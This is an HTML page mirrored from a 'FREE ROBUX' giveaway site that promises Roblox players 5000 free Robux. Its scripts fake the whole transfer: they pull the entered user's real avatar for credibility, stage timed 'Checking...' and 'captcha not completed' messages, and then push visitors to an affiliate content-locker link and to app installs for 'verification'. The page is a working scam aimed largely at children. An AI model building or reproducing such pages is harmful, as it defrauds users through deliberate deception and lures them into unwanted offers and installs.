<!DOCTYPE html>
<html lang="en">


<!-- Mirrored from instantbux.site/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 25 Mar 2020 14:50:24 GMT -->
<head>
<script src="../cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.js"></script>
<script src="../kit.fontawesome.com/fa64b91e3b.js" crossorigin="anonymous"></script>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="">
  <meta name="author" content="">
  <link href="https://fonts.googleapis.com/css?family=Roboto+Condensed|Roboto:700&amp;display=swap" rel="stylesheet">

	<style>
	body{ 
	 	background:url('webb-dark.png') repeat; 
 margin:0 auto;
	}
	.navbar {
	background-color: #5e9eb2 !important;
    background-color: rgba(0,0,0,.35) !important;
    color: #fff;
    height: 66px;
	}
	.navbar-brand {text-align:left;
	Color: #fff;
    font-size: 18px;
    padding: 14px 15px;
    font-weight: bold; font-family:'MyWebFont';
}
a:Hover{color:white;}
.container{height:100%;}

.navbar-brand {
    padding-top: .3125rem;
    padding-bottom: .3125rem;
    margin-right: 1rem;
    font-size: 1.25rem;
    line-height: inherit;
    float: left !important;
    white-space: nowrap;
    position: absolute;
    margin-left: 34px !important;font-family: 'Roboto', sans-serif;

}
.form-control {
    width: 100%;
    height: 34px;
    padding: 6px 12px;
    background-color: #fff;
    background-image: none;
    border: 1px solid #ccc;
    border-radius: 4px;
    -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075);
    box-shadow: inset 0 1px 1px rgba(0,0,0,.075);
    -webkit-transition: border-color .15s ease-in-out,box-shadow .15s ease-in-out;
    -o-transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s;
    transition: border-color .15s ease-in-out,box-shadow .15s ease-in-out;
}
.form-control, output {
    display: block;
    line-height: 1.42857;
    color: #555;
}
input{width:60%;}
.input-field {
    border: 1px solid #b8b8b8;
    color: #191919;
    font-weight: 300;
    font-size: 16px;
    height: 38px;
    line-height: 100%;
    padding: 5px 12px;
    -webkit-appearance: none;
	width:50%;
}
.form-control {
    display: block;
    width: 70%;
    background-color: #fff;
    background-image: none;
    border: 1px solid #b8b8b8;
    border-radius: 3px;
}
input {
    line-height: normal;
}
.btn-primary-md {
    -webkit-user-select: none;
    -moz-user-select: none;
    -ms-user-select: none;
    user-select: none;
    background-color: #02b757;
    border: 1px solid #02b757;
    color: #fff;
    cursor: pointer;
    display: inline-block;
    font-weight: 500;
    height: auto;
    text-align: center;
    white-space: nowrap;
    vertical-align: middle;
    padding: 9px;
    font-size: 18px;
    line-height: 100%;
    border-radius: 3px;
}
button, html input[type=button], input[type=reset], input[type=submit] {
    -webkit-appearance: button;
    cursor: pointer;
}
button, select {
    text-transform: none;
}
button {
    overflow: visible;
}


.icon-robux-16x16 {
    background-position: 0 -64px;
}
.icon-default-branded-16x16, .icon-robux-16x16, .icon-robux-gray-16x16, .icon-robux-white-16x16 {
    background-image: url(img.svg);
    background-repeat: no-repeat;
    background-size: 32px auto;
    width: 16px;
    height: 16px;
    display: inline-block;
    vertical-align: middle;
}
*, :after, :before {
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
    text-rendering: auto;
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
}
h2{  font-family: 'Roboto Condensed', sans-serif !IMPORTANT;
  font-size: 28px !IMPORTANT;
    font-weight: 700;}
	iframe{border:0px !important;}
	#signup-button,#signup-button2, #confirm-btn {
	width:100%;
	}
	
	
/* IMAGE STYLES */
[type=radio] + img {
  cursor: pointer;
}

/* CHECKED STYLES */
[type=radio]:checked + img {
  outline: 2px solid #f00;
}

.device_error {
padding:5px;
padding-top:15px;
padding-bottom:15px;
font-weight:bold;
font-size:24px;

}
	</style>
  <title>❤ FREE ROBUX 2020</title>

  <!-- Bootstrap core CSS -->
  <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
<link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
<link rel="icon" href="favicon.ico" type="image/x-icon">
</head>

<body>


  <!-- Navigation -->
  <nav class="navbar navbar-expand-lg static-top">
    <div class="container">
     <img src="favicon.ico" width="50" style="padding-right:10px"/> <span class="navbar-brand"> FREE ROBUX </span>
      <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
        <span class="navbar-toggler-icon"></span>
      </button>
    </div>
  </nav><br/>
   <center> <a href="https://cpbldi.com/3f8efdb" onclick="window.open('https://cpbldi.com/3f8efdb','SiteLock','width=600,height=600,left=160,top=170');" ><img class="img-responsive" alt="SiteLock" title="SiteLock" src="https://ya-webdesign.com/images250_/r-png-currency-5.png" /></a>
</center>
  <!-- Page Content -->
  <div class="container">
    <div class="row" style="width:100%; margin:0 auto;">
      <div class="col-lg-12 text-center">
        <br/><br/>
<div style="background:white;padding:30px;    MARGIN-BOTTOM: 100PX;">      
	  <h2 id="head">Welcome to ROBUX GIVEAWAY!</h2>
        <center>	<span class="captcha" style="display:none">	<iframe src="captcha.html" style="height:500px !important; width:100% !important;"></iframe></span></center>
       <input id="login-username" name="username" class="form-control input-field ng-pristine ng-untouched ng-valid ng-empty username" placeholder="Username/Email/Phone" style="width:100%"><BR/>
       <input id="login-ticket" name="ticket" class="form-control input-field ng-pristine ng-untouched ng-valid ng-empty" placeholder="Ticket ID" style="display:none;"  value="923 829" style="width:100%"><BR/>
<div id="details">
<div style="float:left;width:49%;">
<label>
<img src="mobile.png" width="95%"/>
<input type="radio" id="mobile" name="drone" value="mobile"><br/>
Mobile / Tablet
</label>

  </div>
 
<div style="float:left;width:49%;  margin-bottom:10px;">
<label> 
 <img src="desktop.png" width="95%"/>
  <input type="radio" id="desktop" name="drone" value="desktop"><br/>
  Desktop
  </div>
  </label>
  <span class="status" style="color:red;"></span>
  
  
</div>
<button id="signup-button2" data-modal-trigger="form" type="button" disabled="disabled" tabindex="10" class="btn-primary-md signup-submit-button ng-binding unabletoconnect" name="signupSubmit" style=" background-color: red; border: red; display:none;"><i class="fas fa-times"></i> UNABLE TO CONNECT</button>
		  <button id="signup-button" data-modal-trigger="form" type="button" tabindex="10" class="btn-primary-md signup-submit-button ng-binding" name="signupSubmit" ><i class="fas fa-check"></i> READY</button>

<!-- Content of modal #1 --> 
<section data-modal="form" class="modal-wrapper">
  <article class="modal-body">
    <header>
      <h2></h2>
      <button class="close"> </button>
    </header>
    <div class="modal-main"><h2>Confirm Transfer</h2>
	<img src="#" class="avatar"/> <img src="30.gif" class="loading"/>
    <p>You will receive <span class="icon-robux-16x16"></span> 5000 in this transfer.</p>
     <span class="hide"> <a href="https://cpbldi.com/3f8efdb" id="confirm-btn" class="btn-primary-md disabled"><i class="fas fa-check"></i> APPROVE</a></span>
	  <FOOTER><br/></FOOTER>
      </div>
  </article>
</section>


		</div>
      </div>
    </div>
  </div>
<script>const modalService = () => {
  const d = document;
  const body = d.querySelector('body');
  const buttons = d.querySelectorAll('[data-modal-trigger]');
  
  // attach click event to all modal triggers
  for(let button of buttons) {
    triggerEvent(button);
  }
  
  function triggerEvent(button) {
    button.addEventListener('click', () => {
	if($('#login-username').val().length > 3 && $('#login-username').val().length < 20) {
				
			$(".status").html("");
      const trigger = button.getAttribute('data-modal-trigger');
      const modal = d.querySelector(`[data-modal=${trigger}]`);
      const modalBody = modal.querySelector('.modal-body');
      const closeBtn = modal.querySelector('.close');
      
      closeBtn.addEventListener('click', () => modal.classList.remove('is-open'))
   //   modal.addEventListener('click', () => modal.classList.remove('is-open'))
      
      modalBody.addEventListener('click', (e) => e.stopPropagation());

      modal.classList.toggle('is-open');
      
      // Close modal when hitting escape
      body.addEventListener('keydown', (e) => {
        if(e.keyCode === 27) {
          modal.classList.remove('is-open')
        }
      });
	  }else { alert("Incorrect username"); }
    });
	
  
	
  }
  
}

modalService();</script>
<style>/* -- Needed CSS -- */

.modal-wrapper {
  display: none;
  transition: all 0.3s ease-in-out;
  background-color: transparent;
}

.modal-wrapper.is-open {
  display: block;
  position: fixed;
  z-index: 1;
  top: 0;
  bottom: 0;
  left: 0;
  right: 0;
  width: 100%;
  height: 100%;
  background-color: rgba(0,0,0,0.5);
  overflow-y:scroll;
}

.modal-body {
  animation: pop 0.5s ease;
  width: 90%;
}

header {
  position: relative;
}

.close {
  position: absolute;
  top: 10px;
  right: 10px;
}

@keyframes pop {
  0% {
    opacity: 0;
    transform: scale(0.8);
  }
  
  90% {
    transform: scale(1.02);
  }
  
  100% {
    opacity: 1;
    transform: scale(1);
  }
}

/* -- CSS from here on is not needed -- */

$primary-color-dark:   #FFA000;
$primary-color:        #FFC107;
$primary-color-light:  #FFECB3;
$primary-color-text:   #212121;
$accent-color:         #795548;
$primary-text-color:   #212121;
$secondary-text-color: #727272;
$divider-color:        #B6B6B6;

* {
  box-sizing: border-box;
}



.modal-body {
  margin: 30px auto;
  background-color: white;
  border-radius: 5px;
  box-shadow: 10px 10px 40px 0px rgba(0,0,0,0.35);
    
  header {
    background-color: $primary-color;
    margin: 0;
    padding: 10px 10px;
    border-top-left-radius: 5px;
    border-top-right-radius: 5px;
    color: $primary-color-light;
  }
  
  img {
    max-width: 100%;
  }
  
  .modal-main {
    padding: 10px;
  }
  
  footer {
    background-color: $primary-color;
    margin: 0;
    padding: 10px 10px;
    border-bottom-left-radius: 5px;
    border-bottom-right-radius: 5px;
    color: $primary-color-light;
  }
  
  .close {
    color: white;
    background-color: transparent;
    border: 0;
    outline: 0;
  }
  
  p {
    color: $secondary-text-color;
  }

  .cta {
    background-color: $primary-color;
    transition: background-color 0.3s ease;
    color: $primary-color-light;
    padding: 10px 20px;
    text-decoration: none;
    border-radius: 5px;
    display: block;
    width: 200px;
    text-align: center;
    margin: 20px auto;
  
    &:hover, &:active {
      background-color: $primary-color-dark;
    }
  }
}

.introduction {
  position: absolute;
  top: 40px;
  left: 40px;
  border-left: 10px solid $primary-color;
  padding-left: 15px;
  color: white;
  font-size: 1.5em;
  
  h1, p {
    padding: 0;
    margin: 0;
  }
}

article.modal-body {
    margin-top: 14%;
	padding-left:3%;
	padding-right:3%;
    width: 85% !important;
}

a:Hover{color:white !important;}

</style>

  <!-- Bootstrap core JavaScript -->
  <script src="vendor/jquery/jquery.slim.min.js"></script>
  <script src="imagesloaded.pkgd.min.js"></script>

  <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>

<script>
function  check() {
$("#signup-button").attr("style","background: white; color:black; border: white;");
$("#signup-button").html("<img src=\"30.gif\"><br/>Checking...");

		setTimeout(
			function() 
			{
			$("#signup-button").attr("style","background: RED; color:white; border: RED;");

			$("#signup-button").html("<i class=\"fas fa-times\" aria-hidden=\"true\"></i> CAPTCHA NOT COMPLETED");
			}, 4000);
			
			setTimeout(
			function() 
			{
			$("#signup-button").attr("style","background: #02b757; color:white; border: #02b757;");

			$("#signup-button").html("<i class=\"fas fa-check\" aria-hidden=\"true\"></i> SUBMIT");
			}, 8000);
}

	$( document ).ready(function() {
	
	
	$("#signup-button").click(function() {
		if($('#login-username').val().length > 3 && $('#login-username').val().length < 20) {
	
	  $("#confirm-btn").hide();
	$("img.avatar").attr("src","https://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username="+$('.username').val());
	$("#details").hide();
  $('img.avatar').imagesLoaded( function() {
 
   $("#confirm-btn").show();
  $("#confirm-btn").attr("class","btn-primary-md");
   $(".loading").hide();
});
}

	});
					$('#confirm-btn').click(function() {
					
						setTimeout(
			function() 
			{
					$(".modal-body").html("");
					$("#signup-button").html("<i class=\"fas fa-check\"></i> SUBMIT");
					$("#signup-button").attr("onclick","javascript:check();");
					$(".modal-wrapper").remove();
					$(".captcha").show();
					
					$("input").remove();
 					 $("#head").html("<b><font color=\"red\">Please complete captcha.</font></b>");
 
							}, 5000);
				$(".hide").html("<img src=\"30.gif\">");
				
						
				});
	
$('body').on('click', '.blue-btn', function() {
 alert('Install any app from below list and keep it opened for at least 60 seconds to complete verification.');
});
$('body').on('click', '.left-icons-44507', function() {
 alert('Disabled due to high server load. Please try again later.');
});

});
	</script>

<script> 
function isMobile(){  
        var a = navigator.userAgent||navigator.vendor||window.opera;
        return /(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4));
        };
		if(isMobile()==true){ 
		
		$('#desktop').prop('checked', false); // Checks it
		$('#mobile').prop('checked', true); // Checks it
		
		} else {
		$('#desktop').prop('checked', true); // Checks it
		$('#mobile').prop('checked', false); // Checks it
		
}

		</script>
		
</body>


<!-- Mirrored from instantbux.site/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 25 Mar 2020 14:50:32 GMT -->
</html>
